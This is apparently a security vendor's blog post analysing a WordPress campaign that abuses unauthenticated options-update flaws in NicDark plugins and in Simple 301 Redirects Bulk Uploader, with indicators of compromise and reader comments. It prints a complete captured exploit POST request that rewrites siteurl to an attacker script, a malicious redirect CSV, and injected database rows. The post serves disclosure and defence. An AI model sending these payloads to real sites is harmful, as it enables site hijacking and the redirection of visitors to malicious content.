Malicious WordPress Redirect Campaign Attacking Several Plugins

Over the past few weeks, our Threat Intelligence team has been tracking an active attack campaign targeting a selection of new and old WordPress plugin vulnerabilities. These attacks seek to maliciously redirect traffic from victims’ sites to a number of potentially harmful locations.

Each of the vulnerabilities targeted by this campaign have been public for some time, and Wordfence users are protected either by individual firewall rules or generic protections built into the plugin. Two of the vulnerabilities in question have firewall rules which are currently available to Premium users only:

  • NicDark Plugins – Unauthenticated Arbitrary Options Update
    • Though several individual plugins are affected, the vulnerability is the same across each and they are covered by a single firewall rule.
    • Affected plugin slugs are prefixed with nd-. Example plugins include Components For WP Bakery Page Builder (slug: nd-shortcodes), Booking (slug: nd-booking), Travel Management (slug: nd-travel), etc.
    • Firewall rule released for Premium users on July 30, 2019
    • Available for Free users starting August 29. 2019
  • Simple 301 Redirects Addon – Bulk Uploader <= 1.2.5 – Unauthenticated Options Update
    • Firewall rule released for Premium users on August 6, 2019
    • Available for Free users starting September 5, 2019

Each of these plugins have updates available which resolve the vulnerabilities. All WordPress users, regardless of firewall status, are advised to keep their plugins up-to-date at all times.

In today’s post we’ll look at the attacks associated with this campaign, and we’ll provide some useful indicators of compromise (IOCs) to assist in identifying similar activity.

Attacks Against NicDark Plugins

The vulnerabilities recently patched in plugins developed by NicDark are all exploited by very similar AJAX requests. In each case the plugin registers a nopriv_ AJAX action, which is accessible even by unauthenticated visitors, responsible for importing various WordPress settings. In these requests, key->value pairs of WordPress options and values are parsed out and applied directly to the affected site’s database.

For example, the following POST request is an attempt to attack the Travel Management plugin:

POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Range: bytes=0-1000000
Connection: keep-alive
Host: [redacted]
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_travel_end_option%5D

In each case, the targeted plugin must be declared in both the action parameter and the GET query string parameter defining the new option values, such as this example’s nd_travel_value_import_settings.

Because these vulnerabilities allow unauthenticated users to modify arbitrary WordPress options, it’s possible for attackers to enable registration as an Administrator user. However, we don’t see that behavior associated with this attack campaign. Instead, as seen in the sample request above, the attackers are modifying the siteurl setting of the victim’s site. In this case, the new value is https://jackielovedogs.com/pret.js?l=1. A subsequent request would then make the same change for the home setting.

The result of this modification is that all of the victim site’s scripts will attempt to load relative to that injected path. For example, instead of a site’s jQuery script loading from https://example.com/wp-includes/js/jquery/jquery.js, it would instead cause the visitor’s browser to open the URL https://jackielovedogs.com/pret.js?l=1/wp-includes/js/jquery/jquery.js. In effect, this replaces all of a site’s loaded JavaScript with a file under the attacker’s control.

Attacks Against Simple 301 Redirects Addon – Bulk Uploader

The other most common attack vector we’ve tracked in this campaign is the Simple 301 Redirects – Addon – Bulk Uploader plugin, which recently patched a vulnerability allowing unauthenticated attackers to inject their own 301 redirect rules onto a victim’s site.

Vulnerable versions of the plugin would constantly listen for the presence of the POST body parameter submit_bulk_301. If this value is present, an uploaded CSV file would be processed and used to import a bulk set of site paths and their redirect destinations.

The following is an example of the CSV files attackers are attempting to upload:

/,https://developsincelock.com/54768?
*,https://developsincelock.com/5868?
/*,https://developsincelock.com/34234?

When a vulnerable site processes this CSV, the site will begin redirecting all of its traffic to the addresses provided.

Other Targeted Plugins

In addition to the primary two above, we have identified related attacks against a number of other formerly-vulnerable plugins, including (but not limited to):

Payload Behavior Analysis

The domains used by the attackers in performing these script injections and redirects rotate with some frequency. New domains appear every few days, and attacks involving older domains taper off. We provide a list of the domains we’ve identified in the IOC section below.

At this time, many of the redirect domains associated with these attacks appear to have been decommissioned, despite the fact that these domains still show up in active attacks at the time of this writing. For example jackielovedogs.com, which appeared in the example request in the ND plugin section above, appears to have been reclaimed by Registrar.eu, a reseller name used by ICANN registrar Openprovider.

Further analysis of this campaign’s long-term behavior is ongoing, and we will provide a followup report as necessary.

Indicators of Compromise (IOCs)

The following IOCs can be used in the process of identifying or tracking activity associated with this campaign.

IP Addresses

The attacks are distributed across a large number of IPs. The top 20 IPs associated with this campaign are listed below. Additionally, addresses listed in bold text appear in the list of IPs Attacking Most Sites as seen in the most recent Wordfence Weekly.

  1. 192.99.38.186
  2. 51.38.69.87
  3. 62.210.252.196
  4. 164.132.44.97
  5. 159.203.81.46
  6. 217.182.95.250
  7. 51.255.43.81
  8. 37.187.198.246
  9. 54.36.246.232
  10. 45.55.152.56
  11. 198.199.100.240
  12. 162.241.175.243
  13. 188.213.175.168
  14. 45.40.143.13
  15. 188.213.166.219
  16. 192.169.227.95
  17. 193.70.2.138
  18. 149.202.75.164
  19. 192.169.157.142
  20. 104.238.97.201

Domain Names

  • greatinstagrampage.com
  • gabriellalovecats.com
  • jackielovedogs.com
  • tomorrowwillbehotmaybe.com
  • go.activeandbanflip.com
  • wiilberedmodels.com
  • developsincelock.com

Conclusion

An active campaign is targeting a number of vulnerabilities in attempts to redirect victim sites’ visitors to potentially harmful destinations. The vulnerabilities in question have all been patched by their developers, so ensure all of your WordPress plugins are up to date. Wordfence Premium users who are unable to update are protected from all of these attacks, while Free users will gain access to these rules in the coming weeks.

Our investigation into these attacks is ongoing. We will continue to track further changes in the campaign’s infrastructure and will provide followup reports as necessary.

As always, please consider sharing this post with your peers to spread awareness of this malicious activity. Additionally, if you believe your site has fallen victim to these or any other attacks, our site cleaning team is here to help. Thank you for reading.

Did you enjoy this post? Share it!

Comments

24 Comments
  • Thanks for this breakdown, I have noticed attacks, in general, continue to increase but we continue to fight back!

    Wordfence is my go-to resource for keeping up to date with these new threats, so thanks and keep up the good work!

    • Thanks, David!

  • We saw the 301 Redirect Bulk Uploader in the wild. Thanks for this update!

  • Would it be helpful to add those ip addresses to the blocked ip address section in our wordpress dashboard?

    • Yes, these IPs are associated with quite a bit of malicious activity. Many of these IPs are covered under our Real-time IP blacklist for Premium users as well.

  • Thanks for the update.

    Had one of my sites redirect with this redirect some 2 months ago using the plugin Yellow Pencil.
    Tried to contact them but didn't get far. The only workaround was to remove this plugin and all was fine.

    Thanks again, guys. This list of hacked code is supper helpful. Is there a place we can advise when we find a hack?

    • If you'd ever like to provide attack data to our team for review, you can email us at samples@wordfence.com. We love emergent threat data.

    • Hi There,

      I think you were you were using the old version of the plugin that's why you get hacked. 7.2.0 and higher all versions are safe.

      By the way, they respond to tickets in 24 hours.

  • Thank you for this information. I was using one of NicDark's plugins on a site. I deleted it.

  • This is why I am about to embark upon a course of study for a degree in Applied Technology at BYU-I, specializing in Cyber Security !!!

    Thanks for all your hard work and keeping us posted!

  • Some attacker attacked a lot of my clients website and they use a very simple technique. They just replace the index file and uploaded some other files which redirect only the front pages but the admin pages are accessible.

  • Thanks for the heads-up! So should we just outright block these IP Addresses by adding them to our permanent block list?

  • Thank you for this information.
    Best!

  • Hi,
    If these domains are blacklisted in our dns, can this help?
    Cheers

    • Hi Jimmy! Blocking the redirect domains at the DNS level will prevent devices in that network from being redirected.

  • Amazing Really Helpfull

  • Hey Mikey, thanks a lot! Just want to check if there's any further updates since 8/23? And if we have any clue what would be the intention behind of this campaign? Seems more like just fraud click?

    • Attacks are still ongoing, but no big changes worth reporting at this time.

      Money is the motivator, as the people behind the malicious ads themselves pay for their distribution.

  • Hello, we had this attack twice on a website. Two lines in the database were switched with these ones:
    (1, 'siteurl', 'https://wiilberedmodels.com/rend.js?l=1&', 'yes'),
    (2, 'home', 'https://wiilberedmodels.com/rend?l=1&', 'yes'),

    I still haven't been able to pinpoint the cause, since none of the listed plugins is installed.

    Hybrid Composer, EU Cookie Law, Disable Gutenberg, Background Update Tester or the Techline theme could be the cause.

    • Hi Daniele! The attackers add and remove vulnerabilities from their rotation fairly frequently. Hybrid Composer was discovered to have an arbitrary options update vulnerability back in July that would have been exploited to cause this. Updating your plugins will resolve the issue. The associated firewall rule is also available to both Free and Premium Wordfence users.

  • Thanks for the update. This is really useful for my client websites.

  • Also plugin WP Private Content Pro is hacked and exploited by these guys. Update to the latest version issued today!

  • Same issue for Wordpress plugin: WP Private Content Plus - all the time page was redirected to js.wiilberedmodels.com.

    Now are two last comments on WP Plugin page: https://pl.wordpress.org/plugins/wp-private-content-plus/#reviews

    • Yes, confirmed, it happened on a customer website with this plugin too.

      Some info: https://www.wpexpertdeveloper.com/major-security-issue-in-wp-private-content-plus-versions-1-31/